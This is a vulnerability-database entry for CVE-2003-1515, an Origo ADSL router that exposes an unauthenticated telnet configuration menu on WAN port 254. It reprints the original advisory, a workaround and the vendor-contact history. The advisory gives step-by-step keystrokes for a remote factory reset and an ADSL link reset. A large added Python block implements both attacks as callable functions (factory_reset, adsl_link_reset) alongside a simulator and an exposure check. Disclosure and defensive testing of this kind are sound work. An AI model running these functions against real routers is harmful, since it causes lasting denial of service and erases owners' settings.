Origo ADSL Router Remote Management Interface Configuration Vulnerability

Vulnerability ID 1202395  Vulnerability type Permissions, privileges and access control
Published 2003-10-20  Updated 2003-12-31
CVE ID CVE-2003-1515
CNNVD ID CNNVD-200312-460
Platform N/A  CVSS score 7.8
|Vulnerability source
https://cxsecurity.com/issue/WLB-2007100121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-460
|Vulnerability details
Origo ADSL is a broadband router. Because it lacks adequate access control, a remote attacker can access the router without authorization, resulting in denial of service. The Origo ADSL exposes a telnet-based configuration interface on the WAN side, listening on port 254, with no password authentication configured; any attacker who connects to this port can reset the device configuration and cause a denial of service.
|Exploit
Vulnerable device
-----------------

Origo ASR-8100 ADSL router
Firmware ETHADSL_USB_110502_REL10_S
Customer Software Version 110502_REL10_S
ADSL Showtime Firmware Version: 3.21
device based on Conexant CX82310-14 chipset

Vulnerability: Remote ADSL reset and permanent denial of service attack
-----------------------------------------------------------------------

The device above can be remotely reset to factory settings, allowing a
permanent denial of service attack until it is reconfigured manually by an
operator.  The attack only takes effect after the device is next reset, which
may be some time after it has been performed.  PPP authentication information
is lost on reset to factory settings, so it is most likely that the device
will be unable to establish a WAN link after reset.

The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
is used) its IP address to be changed.

Attack overview
---------------

A telnet-style configuration interface is left open on the WAN interface on
port 254, without a password being set.  This menu system is very easily
driven by a remote attacker.

A full exploit is given below.

Workaround
----------

Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.

With the web configuration interface at http://router-ip/doc/advance.htm
click on Configuration: Virtual server
Enter a new entry:
Public port: 254
Private port: 9876
TCP
Host IP address: 127.0.0.1
Click 'Add this setting', then do Configuration: Save Settings/Reboot and
click 'Save & Reboot'

Exploit details
---------------

From any Internet connected host:

telnet <router global IP address> 254
Returns a menu:
01/01/99                   CONEXANT SYSTEMS, INC. 
00:04:10
                ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21          
                   
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
  1. SYSTEM STATUS AND CONFIGURATION
  2. ADSL MENU
  
  4. REMOTE LOGON
  
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
  1. SYSTEM INFORMATION
  2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
  1. CHANGE SYSTEM TIME
  2. CHANGE SYSTEM DATE
  3. CHANGE PASSWORD
  4. FACTORY DEFAULT CONFIGURATION

Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't seem to work)

Type 4:  Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)

Type Y:  Message: NVRAM updated

This does not reset the ADSL modem, only clears the NVRAM.  This takes effect
the next time the modem is reset: the admin password is reset to that printed
in the documentation, and the ADSL username/password are reset, meaning the
connection is down permanently until a human sets them up again.  Any other
settings (security etc) are also lost.

From main menu, type 2 to get to ADSL MENU
  1. ADSL PERFORMANCE STATUS
  2. 24 HOUR ADSL PERFORMANCE HISTORY
  3. 7 DAY ADSL PERFORMANCE HISTORY
  4. ADSL ALARM HISTORY
  5. ADSL TRANSCEIVER CONFIGURATION MENU
  6. ADSL LINK RESET

Type 6:  Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y.  The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).
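The two menu walks above, as an added example that is not part of the original advisory, the vendor's firmware or the cxsecurity/CNNVD pages: a Python script that drives the port-254 menu exactly as described (press return at LOGIN PASSWORD>, then 1 -> 2 -> 4 -> Y for the factory reset, or 2 -> 6 -> Y for the ADSL link reset), plus a menu_exposed() check that reports whether the menu is still reachable with an empty password, which is the test to run from an outside host after applying the virtual-server workaround. No Origo device is available here, so the block includes a constructed FakeRouter that replays the menu strings quoted in the advisory on a loopback port; its behaviour on a wrong password (closing the session), the "ADLS link reset" message and the port-0/loopback listener are assumptions of this example, not observed firmware behaviour. The "NVRAM updated" reply, the menu numbering and the two confirmation prompts are taken from the advisory text.

```python
import socket
import socketserver
import threading

# Menu and prompt strings are quoted from the advisory's transcript of the real
# device; FakeRouter around them is a constructed stand-in, not Origo firmware.
BANNER = (b"CONEXANT SYSTEMS, INC.\r\n"
          b"ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21\r\nLOGIN PASSWORD>")
MENUS = {
    "main": b"MAIN MENU\r\n1. SYSTEM STATUS AND CONFIGURATION\r\n2. ADSL MENU\r\n4. REMOTE LOGON\r\n>",
    "system": b"1. SYSTEM INFORMATION\r\n2. SYSTEM CONFIGURATION\r\n>",
    "syscfg": b"1. CHANGE SYSTEM TIME\r\n2. CHANGE SYSTEM DATE\r\n3. CHANGE PASSWORD\r\n"
              b"4. FACTORY DEFAULT CONFIGURATION\r\n>",
    "adsl": b"1. ADSL PERFORMANCE STATUS\r\n5. ADSL TRANSCEIVER CONFIGURATION MENU\r\n"
            b"6. ADSL LINK RESET\r\n>",
    "factory?": b"This will reset all the configurations and the ADSL modem. Are you sure?(Y/N)",
    "link?": b"This will bring down the ADSL link. Are you sure(Y/N)?",
}
# (current menu, keystroke) -> next menu, following the advisory's walk-through
TRANSITIONS = {("main", b"1"): "system", ("main", b"2"): "adsl", ("system", b"2"): "syscfg",
               ("syscfg", b"4"): "factory?", ("adsl", b"6"): "link?"}


class RouterHandler(socketserver.StreamRequestHandler):
    # One simulated port-254 session (constructed; not the real firmware).
    def handle(self):
        self.wfile.write(BANNER)
        if self.rfile.readline().strip() != self.server.password:
            return                      # assumption: a set password ends the session
        state = "main"
        while True:
            self.wfile.write(MENUS[state])
            line = self.rfile.readline()
            if not line:
                return
            key = line.strip().upper()
            if state == "factory?":     # option 4 confirmed: NVRAM cleared, applied on next reboot
                if key == b"Y":
                    self.server.nvram_cleared = True
                    self.wfile.write(b"NVRAM updated\r\n")
                state = "syscfg"
            elif state == "link?":      # option 6 confirmed: ADSL link (and this session) drop
                if key == b"Y":
                    self.server.link_resets += 1
                    self.wfile.write(b"ADSL link reset\r\n")   # constructed message
                    return
                state = "adsl"
            else:
                state = TRANSITIONS.get((state, key), state)


class FakeRouter(socketserver.ThreadingTCPServer):
    # Listens on 127.0.0.1:<free port>; stands in for <router global IP>:254.
    daemon_threads = True

    def __init__(self, password=b""):
        super().__init__(("127.0.0.1", 0), RouterHandler)
        self.password, self.nvram_cleared, self.link_resets = password, False, 0
        self.port = self.server_address[1]
        threading.Thread(target=self.serve_forever, daemon=True).start()


def _step(sock, send, expect):
    """Send one keystroke (None = nothing) and read until `expect` appears or EOF."""
    if send is not None:
        sock.sendall(send + b"\r\n")
    buf = b""
    while expect not in buf:
        chunk = sock.recv(4096)
        if not chunk:               # device closed the session: the prompt never came
            break
        buf += chunk
    return buf


def drive_menu(host, port, path):
    """Connect, press return at LOGIN PASSWORD>, then follow `path`, a list of
    (keystroke, prompt to wait for) pairs.  Returns the last reply, b"" if login failed."""
    with socket.create_connection((host, port), timeout=3) as s:
        _step(s, None, b"LOGIN PASSWORD>")
        reply = _step(s, b"", b"MAIN MENU")
        if b"MAIN MENU" not in reply:
            return b""
        for key, prompt in path:
            reply = _step(s, key, prompt)
        return reply


def menu_exposed(host, port=254):
    """Workaround check: does an empty password still reach the MAIN MENU?"""
    return b"MAIN MENU" in drive_menu(host, port, [])


def factory_reset(host, port=254):
    """MAIN MENU -> 1 -> 2 -> 4 -> Y: the permanent-DoS path from the advisory."""
    path = [(b"1", b"2. SYSTEM CONFIGURATION"), (b"2", b"4. FACTORY DEFAULT"),
            (b"4", b"(Y/N)"), (b"Y", b"NVRAM updated")]
    return b"NVRAM updated" in drive_menu(host, port, path)


def adsl_link_reset(host, port=254):
    """MAIN MENU -> 2 -> 6 -> Y: the temporary-DoS path (link drops, new DHCP lease)."""
    path = [(b"2", b"6. ADSL LINK RESET"), (b"6", b"(Y/N)"), (b"Y", b"ADSL link reset")]
    return b"ADSL link reset" in drive_menu(host, port, path)
```

Against a real unit you would call menu_exposed("<router global IP>") from an Internet host before and after adding the port-254 virtual-server entry from the workaround: it should go from True to False. Each step waits for a string that only the next menu contains, so a device that has a password set (or that drops the session) makes drive_menu return b"" rather than blindly sending the confirmation keystroke.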

Vendor notification
-------------------

UK support for Vendor (support (at) adsltech (dot) com) was notified on 30th August
2003 - entirety of reply message was 'Thanks a lot'.  Vendor doesn't
advertise an email address so were notified via web form on that date - no
response received.  To date the vendor has not advertised any patches or new
firmware.

-- 
Theo Markettos                 theo (at) markettos.org (dot) uk
Clare Hall, Cambridge          theom (at) chiark.greenend.org (dot) uk
CB3 9AL, UK                    http://www.markettos.org.uk/
|References

Source: XF
Name: origo-default-settings-restore(13463)
Link: http://xforce.iss.net/xforce/xfdb/13463
Source: BID
Name: 8855
Link: http://www.securityfocus.com/bid/8855
Source: BUGTRAQ
Name: 20031012 Origo ASR-8100 ADSL router remote factory reset
Link: http://www.securityfocus.com/archive/1/341752
Source: SREASON
Name: 3300
Link: http://securityreason.com/securityalert/3300
Source: NSFOCUS
Name: 5569
Link: http://www.nsfocus.net/vulndb/5569
